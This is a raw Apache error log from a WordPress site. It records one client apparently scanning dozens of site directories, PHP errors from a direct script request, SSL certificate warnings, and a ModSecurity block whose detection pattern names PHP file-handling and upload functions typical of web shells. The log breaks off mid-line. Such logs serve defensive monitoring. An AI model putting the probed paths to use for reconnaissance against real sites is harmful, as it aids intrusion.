directory /home/investig/public_html/wp-admin/js/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive [Mon Mar 17 01:11:16.205312 2025] [autoindex:error] [pid 17074:tid 140188302915328] [client 83.97.112.18:52656] AH01276: Cannot serve directory /home/investig/public_html/wp-content/upgrade/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive [Mon Mar 17 01:11:16.782701 2025] [autoindex:error] [pid 17074:tid 140188277737216] [client 83.97.112.18:52662] AH01276: Cannot serve directory /home/investig/public_html/wp-admin/css/colors/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive [Mon Mar 17 01:11:17.259209 2025] [autoindex:error] [pid 17075:tid 140188328093440] [client 83.97.112.18:52670] AH01276: Cannot serve directory /home/investig/public_html/wp-includes/css/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive [Mon Mar 17 01:11:18.209754 2025] [autoindex:error] [pid 17075:tid 140188509247232] [client 83.97.112.18:52682] AH01276: Cannot serve directory /home/investig/public_html/wp-includes/Requests/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive [Mon Mar 17 01:11:18.847907 2025] [:error] [pid 17075:tid 140188517639936] [client 83.97.112.18:52690] PHP Warning: Use of undefined constant ABSPATH - assumed 'ABSPATH' (this will throw an Error in a future version of PHP) in /home/investig/public_html/wp-includes/blocks/index.php on line 9 [Mon Mar 17 01:11:18.848145 2025] [:error] [pid 17075:tid 140188517639936] [client 83.97.112.18:52690] PHP Warning: Use of undefined constant WPINC - assumed 'WPINC' (this will throw an Error in a future version of PHP) in /home/investig/public_html/wp-includes/blocks/index.php on line 9 [Mon Mar 17 01:11:18.848356 2025] [:error] [pid 17075:tid 140188517639936] [client 83.97.112.18:52690] PHP Warning: require(ABSPATHWPINC/blocks/archives.php): failed to open stream: No such file or directory in /home/investig/public_html/wp-includes/blocks/index.php on line 9 [Mon Mar 17 01:11:18.848613 2025] [:error] [pid 17075:tid 140188517639936] [client 83.97.112.18:52690] PHP Fatal error: require(): Failed opening required 'ABSPATHWPINC/blocks/archives.php' (include_path='.:/usr/local/lib/php') in /home/investig/public_html/wp-includes/blocks/index.php on line 9 [Mon Mar 17 01:11:19.413285 2025] [autoindex:error] [pid 17879:tid 140188484069120] [client 83.97.112.18:52696] AH01276: Cannot serve directory /home/investig/public_html/wp-includes/certificates/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive [Mon Mar 17 01:11:20.088366 2025] [autoindex:error] [pid 17075:tid 140188484069120] [client 83.97.112.18:52700] AH01276: Cannot serve directory /home/investig/public_html/wp-includes/images/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive [Mon Mar 17 01:11:20.580625 2025] [autoindex:error] [pid 17074:tid 140188370056960] [client 83.97.112.18:52706] AH01276: Cannot serve directory /home/investig/public_html/wp-admin/images/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive [Mon Mar 17 01:11:21.055661 2025] [autoindex:error] [pid 17879:tid 140188319700736] [client 83.97.112.18:52714] AH01276: Cannot serve directory /home/investig/public_html/wp-admin/maint/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive [Mon Mar 17 01:11:30.628641 2025] [autoindex:error] [pid 17075:tid 140188386842368] [client 83.97.112.18:52804] AH01276: Cannot serve directory /home/investig/public_html/wp-content/uploads/2021/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive [Mon Mar 17 01:12:31.455634 2025] [autoindex:error] [pid 17879:tid 140188277737216] [client 83.97.112.18:53366] AH01276: Cannot serve directory /home/investig/public_html/wp-admin/css/colors/ectoplasm/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive [Mon Mar 17 01:12:32.029392 2025] [autoindex:error] [pid 17074:tid 140188395235072] [client 83.97.112.18:53368] AH01276: Cannot serve directory /home/investig/public_html/wp-admin/css/colors/light/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive [Mon Mar 17 01:12:33.150500 2025] [autoindex:error] [pid 17879:tid 140188286129920] [client 83.97.112.18:53378] AH01276: Cannot serve directory /home/investig/public_html/wp-admin/css/colors/midnight/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive [Mon Mar 17 01:12:33.643903 2025] [autoindex:error] [pid 17075:tid 140188370056960] [client 83.97.112.18:53384] AH01276: Cannot serve directory /home/investig/public_html/wp-admin/css/colors/modern/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive [Mon Mar 17 01:12:34.123395 2025] [autoindex:error] [pid 17074:tid 140188336486144] [client 83.97.112.18:53390] AH01276: Cannot serve directory /home/investig/public_html/wp-admin/css/colors/ocean/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive [Mon Mar 17 01:12:34.607725 2025] [autoindex:error] [pid 17075:tid 140188344878848] [client 83.97.112.18:53398] AH01276: Cannot serve directory /home/investig/public_html/wp-admin/css/colors/sunrise/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive [Mon Mar 17 01:12:35.092330 2025] [autoindex:error] [pid 17879:tid 140188361664256] [client 83.97.112.18:53402] AH01276: Cannot serve directory /home/investig/public_html/wp-admin/js/widgets/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive [Mon Mar 17 01:12:35.586540 2025] [autoindex:error] [pid 17879:tid 140188244166400] [client 83.97.112.18:53408] AH01276: Cannot serve directory /home/investig/public_html/wp-content/languages/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive [Mon Mar 17 01:12:36.117555 2025] [autoindex:error] [pid 17879:tid 140188509247232] [client 83.97.112.18:53416] AH01276: Cannot serve directory /home/investig/public_html/wp-content/uploads/2022/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive [Mon Mar 17 01:12:36.601176 2025] [autoindex:error] [pid 17075:tid 140188244166400] [client 83.97.112.18:53422] AH01276: Cannot serve directory /home/investig/public_html/wp-content/uploads/2023/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive [Mon Mar 17 01:12:37.143986 2025] [autoindex:error] [pid 17074:tid 140188378449664] [client 83.97.112.18:53428] AH01276: Cannot serve directory /home/investig/public_html/wp-content/uploads/2024/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive [Mon Mar 17 01:12:40.033449 2025] [autoindex:error] [pid 17073:tid 140188311308032] [client 83.97.112.18:53456] AH01276: Cannot serve directory /home/investig/public_html/wp-includes/css/dist/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive [Mon Mar 17 01:12:40.544066 2025] [autoindex:error] [pid 17074:tid 140188517639936] [client 83.97.112.18:53462] AH01276: Cannot serve directory /home/investig/public_html/wp-includes/ID3/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive [Mon Mar 17 01:12:43.229228 2025] [autoindex:error] [pid 17879:tid 140188344878848] [client 83.97.112.18:53488] AH01276: Cannot serve directory /home/investig/public_html/wp-includes/images/crystal/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive [Mon Mar 17 01:12:43.715095 2025] [autoindex:error] [pid 17879:tid 140188286129920] [client 83.97.112.18:53496] AH01276: Cannot serve directory /home/investig/public_html/wp-includes/images/media/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive [Mon Mar 17 01:12:44.257799 2025] [autoindex:error] [pid 17075:tid 140188269344512] [client 83.97.112.18:53500] AH01276: Cannot serve directory /home/investig/public_html/wp-includes/images/smilies/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive [Mon Mar 17 01:12:44.830757 2025] [autoindex:error] [pid 17075:tid 140188500854528] [client 83.97.112.18:53502] AH01276: Cannot serve directory /home/investig/public_html/wp-includes/images/wlw/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive [Mon Mar 17 01:12:45.407400 2025] [autoindex:error] [pid 17075:tid 140188395235072] [client 83.97.112.18:53506] AH01276: Cannot serve directory /home/investig/public_html/wp-includes/js/codemirror/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive [Mon Mar 17 01:12:45.898814 2025] [autoindex:error] [pid 17075:tid 140188370056960] [client 83.97.112.18:53508] AH01276: Cannot serve directory /home/investig/public_html/wp-includes/js/plupload/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive [Mon Mar 17 01:12:46.379455 2025] [autoindex:error] [pid 17073:tid 140188286129920] [client 83.97.112.18:53510] AH01276: Cannot serve directory /home/investig/public_html/wp-includes/PHPMailer/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive [Mon Mar 17 01:12:46.990393 2025] [autoindex:error] [pid 17074:tid 140188260951808] [client 83.97.112.18:53516] AH01276: Cannot serve directory /home/investig/public_html/wp-includes/sitemaps/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive [Mon Mar 17 01:12:47.555190 2025] [autoindex:error] [pid 17074:tid 140188492461824] [client 83.97.112.18:53520] AH01276: Cannot serve directory /home/investig/public_html/wp-includes/sitemaps/providers/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive [Mon Mar 17 01:13:55.347046 2025] [autoindex:error] [pid 17879:tid 140188386842368] [client 83.97.112.18:53902] AH01276: Cannot serve directory /home/investig/public_html/wp-includes/js/tinymce/plugins/fullscreen/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive [Mon Mar 17 01:14:23.672092 2025] [autoindex:error] [pid 17075:tid 140188269344512] [client 83.97.112.18:54048] AH01276: Cannot serve directory /home/investig/public_html/wp-admin/css/colors/blue/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive [Mon Mar 17 01:14:29.078545 2025] [autoindex:error] [pid 17075:tid 140188492461824] [client 83.97.112.18:54082] AH01276: Cannot serve directory /home/investig/public_html/images/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive [Mon Mar 17 01:14:29.574465 2025] [autoindex:error] [pid 17075:tid 140188403627776] [client 83.97.112.18:54086] AH01276: Cannot serve directory /home/investig/public_html/css/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive [Mon Mar 17 01:14:30.072771 2025] [autoindex:error] [pid 17075:tid 140188353271552] [client 83.97.112.18:54090] AH01276: Cannot serve directory /home/investig/public_html/wp-admin/css/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive [Mon Mar 17 01:14:30.641217 2025] [autoindex:error] [pid 17074:tid 140188500854528] [client 83.97.112.18:54092] AH01276: Cannot serve directory /home/investig/public_html/wp-includes/js/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive [Mon Mar 17 01:14:31.218068 2025] [autoindex:error] [pid 17075:tid 140188286129920] [client 83.97.112.18:54096] AH01276: Cannot serve directory /home/investig/public_html/wp-includes/SimplePie/XML/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive [Mon Mar 17 01:14:38.557952 2025] [autoindex:error] [pid 17879:tid 140188311308032] [client 83.97.112.18:54140] AH01276: Cannot serve directory /home/investig/public_html/wp-includes/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive [Mon Mar 17 01:14:39.047515 2025] [autoindex:error] [pid 17879:tid 140188328093440] [client 83.97.112.18:54144] AH01276: Cannot serve directory /home/investig/public_html/wp-includes/IXR/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive [Mon Mar 17 01:14:39.532783 2025] [autoindex:error] [pid 17879:tid 140188244166400] [client 83.97.112.18:54150] AH01276: Cannot serve directory /home/investig/public_html/wp-includes/SimplePie/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive [Mon Mar 17 01:14:40.031533 2025] [autoindex:error] [pid 17075:tid 140188336486144] [client 83.97.112.18:54154] AH01276: Cannot serve directory /home/investig/public_html/wp-includes/Text/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive [Mon Mar 17 01:14:40.579739 2025] [autoindex:error] [pid 17073:tid 140188344878848] [client 83.97.112.18:54156] AH01276: Cannot serve directory /home/investig/public_html/wp-includes/Text/Diff/Renderer/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive [Mon Mar 17 01:14:41.591754 2025] [autoindex:error] [pid 17879:tid 140188269344512] [client 83.97.112.18:54162] AH01276: Cannot serve directory /home/investig/public_html/wp-includes/customize/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive [Mon Mar 17 01:14:42.074423 2025] [autoindex:error] [pid 17075:tid 140188244166400] [client 83.97.112.18:54166] AH01276: Cannot serve directory /home/investig/public_html/wp-includes/fonts/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive [Mon Mar 17 01:14:42.568323 2025] [autoindex:error] [pid 17073:tid 140188286129920] [client 83.97.112.18:54170] AH01276: Cannot serve directory /home/investig/public_html/wp-includes/pomo/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive [Mon Mar 17 01:14:43.137249 2025] [autoindex:error] [pid 17075:tid 140188328093440] [client 83.97.112.18:54174] AH01276: Cannot serve directory /home/investig/public_html/wp-includes/rest-api/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive [Mon Mar 17 01:14:43.709633 2025] [autoindex:error] [pid 17073:tid 140188500854528] [client 83.97.112.18:54176] AH01276: Cannot serve directory /home/investig/public_html/wp-includes/widgets/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive [Mon Mar 17 01:15:07.346127 2025] [autoindex:error] [pid 17075:tid 140188252559104] [client 83.97.112.18:54308] AH01276: Cannot serve directory /home/investig/public_html/wp-includes/theme-compat/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive [Mon Mar 17 01:15:12.070037 2025] [autoindex:error] [pid 17073:tid 140188269344512] [client 83.97.112.18:54338] AH01276: Cannot serve directory /home/investig/public_html/fonts/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive [Mon Mar 17 01:15:12.593187 2025] [autoindex:error] [pid 17879:tid 140188252559104] [client 83.97.112.18:54342] AH01276: Cannot serve directory /home/investig/public_html/js/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive [Mon Mar 17 01:15:29.558061 2025] [autoindex:error] [pid 17879:tid 140188509247232] [client 83.97.112.18:54438] AH01276: Cannot serve directory /home/investig/public_html/wp-includes/assets/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive [Mon Mar 17 01:15:30.038030 2025] [autoindex:error] [pid 17879:tid 140188395235072] [client 83.97.112.18:54442] AH01276: Cannot serve directory /home/investig/public_html/wp-includes/js/jcrop/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive [Mon Mar 17 03:28:24.082768 2025] [ssl:warn] [pid 2009:tid 140004250601344] AH01909: investigacionperu.com:443:0 server certificate does NOT include an ID which matches the server name [Mon Mar 17 03:28:24.308559 2025] [ssl:warn] [pid 2010:tid 140004250601344] AH01909: investigacionperu.com:443:0 server certificate does NOT include an ID which matches the server name [Mon Mar 17 03:28:24.739325 2025] [ssl:warn] [pid 2010:tid 140004250601344] AH01909: investigacionperu.com:443:0 server certificate does NOT include an ID which matches the server name [Mon Mar 17 03:28:29.284731 2025] [ssl:warn] [pid 2010:tid 140004250601344] AH01909: investigacionperu.com:443:0 server certificate does NOT include an ID which matches the server name [Mon Mar 17 03:28:31.586413 2025] [ssl:warn] [pid 2464:tid 140297480755072] AH01909: investigacionperu.com:443:0 server certificate does NOT include an ID which matches the server name [Mon Mar 17 03:28:31.820002 2025] [ssl:warn] [pid 2465:tid 140297480755072] AH01909: investigacionperu.com:443:0 server certificate does NOT include an ID which matches the server name [Mon Mar 17 13:23:58.183657 2025] [:error] [pid 2484:tid 140297103169280] [client 13.40.37.100:47796] [client 13.40.37.100] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i)(?:\\\\b(?:f(?:tp_(?:nb_)?f?(?:ge|pu)t|get(?:s?s|c)|scanf|write|open|read)|gz(?:(?:encod|writ)e|compress|open|read)|s(?:ession_start|candir)|read(?:(?:gz)?file|dir)|move_uploaded_file|(?:proc_|bz)open|call_user_func)|\\\\$_(?:(?:pos|ge)t|session))\\\\b" at 